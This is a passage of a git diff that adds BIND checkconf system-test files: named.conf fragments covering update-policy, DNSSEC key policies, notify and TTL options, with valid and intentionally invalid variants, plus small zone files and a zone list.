@@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfsub . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy4.conf b/bin/tests/system/checkconf/good-update-policy4.conf new file mode 100644 index 0000000..6296bb2 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy4.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfsub * TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy5.conf b/bin/tests/system/checkconf/good-update-policy5.conf new file mode 100644 index 0000000..2c900bb --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy5.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfwild * TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy6.conf b/bin/tests/system/checkconf/good-update-policy6.conf new file mode 100644 index 0000000..e615812 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy6.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * selfwild . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy7.conf b/bin/tests/system/checkconf/good-update-policy7.conf new file mode 100644 index 0000000..5beb004 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy7.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * krb5-self . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy8.conf b/bin/tests/system/checkconf/good-update-policy8.conf new file mode 100644 index 0000000..496bc90 --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy8.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * ms-self . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-update-policy9.conf b/bin/tests/system/checkconf/good-update-policy9.conf new file mode 100644 index 0000000..691287a --- /dev/null +++ b/bin/tests/system/checkconf/good-update-policy9.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com" { + type master; + file "example.com.db"; + update-policy { + grant * ms-subdomain . TXT; + }; +}; diff --git a/bin/tests/system/checkconf/good-view-also-notify.conf b/bin/tests/system/checkconf/good-view-also-notify.conf new file mode 100644 index 0000000..2efb9b0 --- /dev/null +++ b/bin/tests/system/checkconf/good-view-also-notify.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view example { + also-notify { missing; }; + zone "example.net" { + type slave; + notify no; + masters { 192.168.1.1; }; + }; +}; diff --git a/bin/tests/system/checkconf/good.conf b/bin/tests/system/checkconf/good.conf new file mode 100644 index 0000000..0ecdb68 --- /dev/null +++ b/bin/tests/system/checkconf/good.conf @@ -0,0 +1,289 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This is just a random selection of configuration options. + */ + +/* cut here */ +dnssec-policy "test" { + dnskey-ttl 3600; + keys { + ksk key-directory lifetime P1Y algorithm 13 256; + zsk key-directory lifetime P30D algorithm 13; + csk key-directory lifetime P30D algorithm 8 2048; + }; + max-zone-ttl 86400; + nsec3param ; + parent-ds-ttl 7200; + parent-propagation-delay PT1H; + publish-safety PT3600S; + purge-keys P90D; + retire-safety PT3600S; + signatures-refresh P3D; + signatures-validity P2W; + signatures-validity-dnskey P14D; + zone-propagation-delay PT5M; +}; +options { + avoid-v4-udp-ports { + 100; + }; + avoid-v6-udp-ports { + 100; + }; + blackhole { + 10.0.0.0/8; + }; + coresize 1073741824; + datasize 104857600; + directory "."; + dscp 41; + dump-file "named_dumpdb"; + files 1000; + heartbeat-interval 30; + hostname none; + interface-interval 30; + keep-response-order { + 10.0.10.0/24; + }; + listen-on port 90 { + "any"; + }; + listen-on port 100 dscp 33 { + 127.0.0.1/32; + }; + listen-on-v6 port 53 dscp 57 { + "none"; + }; + match-mapped-addresses yes; + memstatistics-file "named.memstats"; + pid-file none; + port 5300; + querylog yes; + recursing-file "named.recursing"; + recursive-clients 3000; + serial-query-rate 100; + server-id none; + update-quota 200; + check-names primary warn; + check-names secondary ignore; + max-cache-size 20000000000000; + nta-lifetime 604800; + nta-recheck 604800; + validate-except { + "corp"; + }; + dnssec-policy "test"; + max-ixfr-ratio 90%; + transfer-source 0.0.0.0 dscp 63; + zone-statistics none; +}; +parental-agents "parents" { + 10.10.10.11; + 10.10.10.12; +}; +view "first" { + match-clients { + "none"; + }; + zone "example1" { + type master; + file "xxx"; + update-policy local; + max-ixfr-ratio 20%; + notify-source 10.10.10.10 port 53 dscp 55; + }; + zone "clone" { + type master; + file "yyy"; + inline-signing yes; + max-ixfr-ratio unlimited; + }; + dnssec-validation auto; + zone-statistics terse; +}; +view "second" { + match-clients { + "any"; + }; + zone "example1" { + type master; + file "zzz"; + update-policy local; + zone-statistics yes; + }; + zone "example2" { + type static-stub; + forward only; + forwarders { + 10.53.0.4; + }; + zone-statistics no; + }; + zone "example3" { + type static-stub; + server-addresses { + 1.2.3.4; + }; + }; + zone "clone" { + in-view "first"; + }; + zone "." { + type redirect; + masters { + 1.2.3.4; + }; + }; + dnssec-validation auto; + zone-statistics full; +}; +view "third" { + match-clients { + "none"; + }; + zone "clone" { + in-view "first"; + forward only; + forwarders { + 10.0.0.100; + }; + }; + zone "dnssec" { + type master; + file "file"; + allow-update { + "any"; + }; + dnssec-policy "default"; + }; + zone "p" { + type primary; + file "pfile"; + inline-signing yes; + }; + zone "s" { + type secondary; + file "sfile"; + inline-signing yes; + masters { + 1.2.3.4; + }; + notify primary-only; + }; +}; +view "fourth" { + zone "dnssec-test" { + type master; + file "dnssec-test.db"; + inline-signing yes; + parental-agents { + 1.2.3.4; + 1.2.3.5; + }; + dnssec-policy "test"; + parental-source 10.10.10.10 port 53 dscp 55; + }; + zone "dnssec-default" { + type master; + file "dnssec-default.db"; + inline-signing yes; + parental-agents { + "parents"; + }; + dnssec-policy "default"; + }; + zone "dnssec-inherit" { + type master; + file "dnssec-inherit.db"; + inline-signing yes; + }; + zone "dnssec-none" { + type master; + file "dnssec-none.db"; + dnssec-policy "none"; + }; + zone "dnssec-view1" { + type master; + file "dnssec-view41.db"; + inline-signing yes; + dnssec-policy "test"; + }; + zone "dnssec-view2" { + type master; + file "dnssec-view42.db"; + inline-signing yes; + }; + zone "dnssec-view3" { + type master; + file "dnssec-view43.db"; + dnssec-policy "none"; + key-directory "keys"; + }; + zone "dnssec-view4" { + type master; + file "dnssec-view44.db"; + dnssec-policy "none"; + }; + dnssec-policy "default"; + key-directory "."; +}; +view "fifth" { + zone "dnssec-view1" { + type master; + file "dnssec-view51.db"; + inline-signing yes; + dnssec-policy "test"; + }; + zone "dnssec-view2" { + type master; + file "dnssec-view52.db"; + inline-signing yes; + dnssec-policy "test"; + key-directory "keys"; + }; + zone "dnssec-view3" { + type master; + file "dnssec-view53.db"; + inline-signing yes; + dnssec-policy "default"; + key-directory "keys"; + }; + zone "dnssec-view4" { + type master; + file "dnssec-view54.db"; + dnssec-policy "none"; + }; + key-directory "."; +}; +view "chaos" chaos { + zone "hostname.bind" chaos { + type master; + database "_builtin hostname"; + inline-signing yes; + }; +}; +dyndb "name" "library.so" { + this; + \}; + is a { + "test" { \{ of; the; }; + } bracketed; + "text \""; + system; +}; +key "mykey" { + algorithm "hmac-md5"; + secret "qwertyuiopasdfgh"; +}; diff --git a/bin/tests/system/checkconf/good.zonelist b/bin/tests/system/checkconf/good.zonelist new file mode 100644 index 0000000..08a5665 --- /dev/null +++ b/bin/tests/system/checkconf/good.zonelist @@ -0,0 +1,24 @@ +example1 IN first master +clone IN first master +example1 IN second master +example2 IN second static-stub +example3 IN second static-stub +clone IN second in-view first +. IN second redirect +clone IN third in-view first +dnssec IN third master +p IN third primary +s IN third secondary +dnssec-test IN fourth master +dnssec-default IN fourth master +dnssec-inherit IN fourth master +dnssec-none IN fourth master +dnssec-view1 IN fourth master +dnssec-view2 IN fourth master +dnssec-view3 IN fourth master +dnssec-view4 IN fourth master +dnssec-view1 IN fifth master +dnssec-view2 IN fifth master +dnssec-view3 IN fifth master +dnssec-view4 IN fifth master +hostname.bind chaos chaos master diff --git a/bin/tests/system/checkconf/hint-nofile.conf b/bin/tests/system/checkconf/hint-nofile.conf new file mode 100644 index 0000000..1d1dee2 --- /dev/null +++ b/bin/tests/system/checkconf/hint-nofile.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type hint; + file "nonexistent.db"; +}; diff --git a/bin/tests/system/checkconf/in-view-good.conf b/bin/tests/system/checkconf/in-view-good.conf new file mode 100644 index 0000000..afda587 --- /dev/null +++ b/bin/tests/system/checkconf/in-view-good.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view internal { + zone shared.example { + type master; + file "shared.example.db"; + }; +}; + +view external { + zone shared.example { + in-view internal; + }; +}; diff --git a/bin/tests/system/checkconf/inline-bad.conf b/bin/tests/system/checkconf/inline-bad.conf new file mode 100644 index 0000000..2eb23a5 --- /dev/null +++ b/bin/tests/system/checkconf/inline-bad.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl "transferees" {}; +masters "stealthMasters" {127.0.0.1;}; +masters "publicSlaves" {127.0.0.1;}; +zone "example.net" { + type slave; + key-directory "/var/lib/bind/example.net"; + auto-dnssec maintain; + inline-signing yes; + masters { stealthMasters; }; + notify explicit; + also-notify { publicSlaves; }; + allow-transfer { localhost; transferees; }; +}; + diff --git a/bin/tests/system/checkconf/inline-good.conf b/bin/tests/system/checkconf/inline-good.conf new file mode 100644 index 0000000..60c3b1e --- /dev/null +++ b/bin/tests/system/checkconf/inline-good.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl "transferees" {}; +masters "stealthMasters" {127.0.0.1;}; +masters "publicSlaves" {127.0.0.1;}; +zone "example.net" { + type slave; + file "/var/cache/bind/example.net.db"; + key-directory "/var/lib/bind/example.net"; + auto-dnssec maintain; + inline-signing yes; + masters { stealthMasters; }; + notify explicit; + also-notify { publicSlaves; }; + allow-transfer { localhost; transferees; }; +}; + diff --git a/bin/tests/system/checkconf/inline-no.conf b/bin/tests/system/checkconf/inline-no.conf new file mode 100644 index 0000000..64657f9 --- /dev/null +++ b/bin/tests/system/checkconf/inline-no.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl "transferees" {}; +masters "stealthMasters" {127.0.0.1;}; +masters "publicSlaves" {127.0.0.1;}; +zone "example.net" { + type slave; + key-directory "/var/lib/bind/example.net"; + auto-dnssec maintain; + inline-signing no; + masters { stealthMasters; }; + notify explicit; + also-notify { publicSlaves; }; + allow-transfer { localhost; transferees; }; +}; + diff --git a/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf b/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf new file mode 100644 index 0000000..6e86d90 --- /dev/null +++ b/bin/tests/system/checkconf/kasp-and-other-dnssec-options.conf @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "good-kasp.conf"; + +zone "nsec3.net" { + type master; + file "nsec3.db"; + dnssec-policy "test"; + auto-dnssec maintain; + dnskey-sig-validity 3600; + dnssec-dnskey-kskonly yes; + dnssec-secure-to-insecure yes; + dnssec-update-mode maintain; + inline-signing no; + sig-validity-interval 3600; + update-check-ksk yes; +}; diff --git a/bin/tests/system/checkconf/kasp-bad-keylen.conf b/bin/tests/system/checkconf/kasp-bad-keylen.conf new file mode 100644 index 0000000..7e3465f --- /dev/null +++ b/bin/tests/system/checkconf/kasp-bad-keylen.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "bad-keylen" { + keys { + csk lifetime P10Y algorithm rsasha1 511; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "bad-keylen"; +}; diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf new file mode 100644 index 0000000..474c1d8 --- /dev/null +++ b/bin/tests/system/checkconf/kasp-bad-nsec3-alg.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "bad-salt" { + keys { + csk lifetime unlimited algorithm rsasha1; + }; + nsec3param ; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "bad-salt"; +}; + diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf new file mode 100644 index 0000000..2333ca7 --- /dev/null +++ b/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf @@ -0,0 +1,61 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "rsasha1" { + keys { + csk lifetime P10Y algorithm nsec3rsasha1 1024; + }; + nsec3param iterations 150; +}; + +dnssec-policy "rsasha1-bad" { + keys { + csk lifetime P10Y algorithm nsec3rsasha1 1024; + }; + nsec3param iterations 151; +}; + +dnssec-policy "rsasha256" { + keys { + csk lifetime P10Y algorithm rsasha256 2048; + }; + nsec3param iterations 150; +}; + +dnssec-policy "rsasha256-bad" { + keys { + csk lifetime P10Y algorithm rsasha256 2048; + }; + nsec3param iterations 151; +}; + +dnssec-policy "rsasha512" { + keys { + csk lifetime P10Y algorithm rsasha512 4096; + }; + nsec3param iterations 150; +}; + +dnssec-policy "rsasha512-bad" { + keys { + csk lifetime P10Y algorithm rsasha512 4096; + }; + nsec3param iterations 151; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "default"; + inline-signing yes; +}; diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf new file mode 100644 index 0000000..3465c39 --- /dev/null +++ b/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "bad-salt" { + nsec3param salt "pepper"; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "bad-salt"; +}; + diff --git a/bin/tests/system/checkconf/kasp-ignore-keylen.conf b/bin/tests/system/checkconf/kasp-ignore-keylen.conf new file mode 100644 index 0000000..b1f1af0 --- /dev/null +++ b/bin/tests/system/checkconf/kasp-ignore-keylen.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "warn-length" { + keys { + // Algorithm 13 has predefined length, warn about length param. + csk lifetime unlimited algorithm ecdsa256 2048; + }; +}; + +zone "example.net" { + type master; + file "example.db"; + dnssec-policy "warn-length"; + inline-signing yes; +}; + diff --git a/bin/tests/system/checkconf/max-cache-size-good.conf b/bin/tests/system/checkconf/max-cache-size-good.conf new file mode 100644 index 0000000..bb12775 --- /dev/null +++ b/bin/tests/system/checkconf/max-cache-size-good.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-cache-size 60%; +}; diff --git a/bin/tests/system/checkconf/max-ttl.conf b/bin/tests/system/checkconf/max-ttl.conf new file mode 100644 index 0000000..ec97de5 --- /dev/null +++ b/bin/tests/system/checkconf/max-ttl.conf @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + max-zone-ttl 600; +}; + +zone "maxttl1.example" { + type master; + file "maxttl-bad.db"; +}; + +zone "maxttl2.example" { + type master; + file "maxttl-bad.db"; + max-zone-ttl 300; +}; + +zone "maxttl3.example" { + type master; + file "maxttl-bad.db"; + max-zone-ttl 120; +}; diff --git a/bin/tests/system/checkconf/maxttl-bad.conf b/bin/tests/system/checkconf/maxttl-bad.conf new file mode 100644 index 0000000..aa764be --- /dev/null +++ b/bin/tests/system/checkconf/maxttl-bad.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + max-zone-ttl 8000w; +}; + +zone "maxttl.example" { + type master; + file "maxttl-bad.db"; +}; + + diff --git a/bin/tests/system/checkconf/maxttl-bad.db b/bin/tests/system/checkconf/maxttl-bad.db new file mode 100644 index 0000000..978f0ec --- /dev/null +++ b/bin/tests/system/checkconf/maxttl-bad.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a 600 A 10.0.0.1 +mail 900 A 10.0.0.2 diff --git a/bin/tests/system/checkconf/maxttl.db b/bin/tests/system/checkconf/maxttl.db new file mode 100644 index 0000000..3ad695e --- /dev/null +++ b/bin/tests/system/checkconf/maxttl.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 ; 10 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/checkconf/notify.conf b/bin/tests/system/checkconf/notify.conf new file mode 100644 index 0000000..d6e324a --- /dev/null +++ b/bin/tests/system/checkconf/notify.conf @@ -0,0 +1,84 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + notify master-only; + + # also-notify inconsistent with master-only notify option + zone "slave" { + type slave; + masters { 1.2.3.4; }; + also-notify { 5.6.7.8; }; + }; + + # OK + zone "master" { + type master; + file "filename"; + also-notify { 5.6.7.8; }; + }; +}; + +view two { + notify no; + + # also-notify inconsistent with notify option at the view level + zone "slave" { + type slave; + masters { 1.2.3.4; }; + also-notify { 5.6.7.8; }; + }; + + # OK + zone "master" { + type master; + file "filename"; + notify yes; + also-notify { 5.6.7.8; }; + }; +}; + +view three { + # also-notify inconsistent with notify option at the zone level + zone "slave" { + type slave; + masters { 1.2.3.4; }; + notify no; + also-notify { 5.6.7.8; }; + }; + + # OK + zone "master" { + type master; + file "filename"; + also-notify { 5.6.7.8; }; + }; +}; + +view four { + also-notify { 5.6.7.8; }; + + # OK + zone "slave" { + type slave; + masters { 1.2.3.4; }; + notify master-only; + }; + + # OK + zone "master" { + type master; + file "filename"; + notify no; + }; +}; diff --git a/bin/tests/system/checkconf/portrange-good.conf b/bin/tests/system/checkconf/portrange-good.conf new file mode 100644 index 0000000..c4eb582 --- /dev/null +++ b/bin/tests/system/checkconf/portrange-good.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + avoid-v4-udp-ports { + 1935; + 2605; + 4321; + 6514; + range 8610 8614; + }; +}; diff --git a/bin/tests/system/checkconf/range.conf b/bin/tests/system/checkconf/range.conf new file mode 100644 index 0000000..b389ecb --- /dev/null +++ b/bin/tests/system/checkconf/range.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 999999; + dscp 222; + listen-on port 100 dscp 444 { + 127.0.0.1/32; + }; +}; + +zone "example" { + type master; + file "example.db"; +}; diff --git a/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf b/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf new file mode 100644 index 0000000..3ff6b0d --- /dev/null +++ b/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + stale-refresh-time 0; +}; diff --git a/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf b/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf new file mode 100644 index 0000000..9e0669c --- /dev/null +++ b/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + stale-refresh-time 29; +}; diff --git a/bin/tests/system/checkconf/shared.example.db b/bin/tests/system/checkconf/shared.example.db new file mode 100644 index 